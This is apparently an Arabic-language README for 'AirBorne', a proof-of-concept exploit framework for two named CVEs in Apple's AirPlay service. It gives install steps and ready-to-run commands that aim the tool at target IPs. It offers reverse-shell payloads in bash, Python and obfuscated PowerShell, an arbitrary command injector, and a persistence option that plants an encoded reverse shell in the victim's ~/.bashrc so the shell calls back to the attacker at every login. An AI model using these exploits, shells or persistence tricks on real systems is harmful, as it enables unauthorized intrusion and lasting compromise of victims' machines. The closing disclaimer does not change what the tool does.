
إثبات المفهوم لـ CVE-2025-24252 و CVE-2025-24132
إطار عمل PoC كامل لـ CVE-2025-24252 و CVE-2025-24132
بواسطة ekomsSavior |
AirBorne هو إطار عمل برهان مفهوم (PoC) مشترك يستهدف ثغرتين خطيرتين في خدمة AirPlay من Apple. يتضمن مشغل تعطل كامل واستغلال شل عكسي يعمل مع استمرارية اختيارية، ومستمع، وتنسيقات حمولات متعددة — كل ذلك في سكريبت واحد.
هل تبحث عن النسخة الأصلية؟
الإصدار القديم لا يزال متاحًا في فرعlegacyمن هذا المستودع.
للتحقق منه:
git checkout legacy
.bashrc (لينكس)git clone https://github.com/ekomsSavior/AirBorne-PoC.git
cd AirBorne-PoC
sudo apt update
sudo apt install -y python3-scapy netcat
السكريبت الوحيد airborne.py يتضمن كلا البرهانين وجميع المنطق:
--exploit--payload--persistentsudo python3 airborne.py --exploit 24252 --interface wlan0
يتطلب واجهة في وضع المراقبة.
ابدأ الاستغلال الكامل مع شل bash الافتراضي:
sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99
اختر شل Python بدلاً من ذلك:
sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99 --payload python
تمكين الاستمرارية الحقيقية على أهداف لينكس:
sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99 --persistent
حقن أوامر الشل فقط
sudo python3 airborne_bash_command_injector.py --exploit 24132 --target 192.168.1.42 --command "command"
| الحمولة | الوصف |
|---|---|
bash | شل عكسي bash افتراضي عبر TCP |
python | شل عكسي يعتمد على Python باستخدام socket و pty |
powershell | حمولة RCE كاملة لـ Windows PowerShell (مشوشة) |
عند استخدام --persistent، سيقوم السكريبت بإلحاق حمولة الشل العكسي المشفرة إلى ملف الهدف:
~/.bashrc
يضمن ذلك إعادة شل إليك في كل مرة يسجل فيها المستخدم الدخول أو يتم إنشاء طرفية.
base64 وتسليمه بعد تجاوز سعة المخزن المؤقتهذا المشروع مخصص للأغراض التعليمية والأخلاقية والبحث المصرح به فقط.
استغلال الأنظمة دون إذن غير قانوني وغير أخلاقي.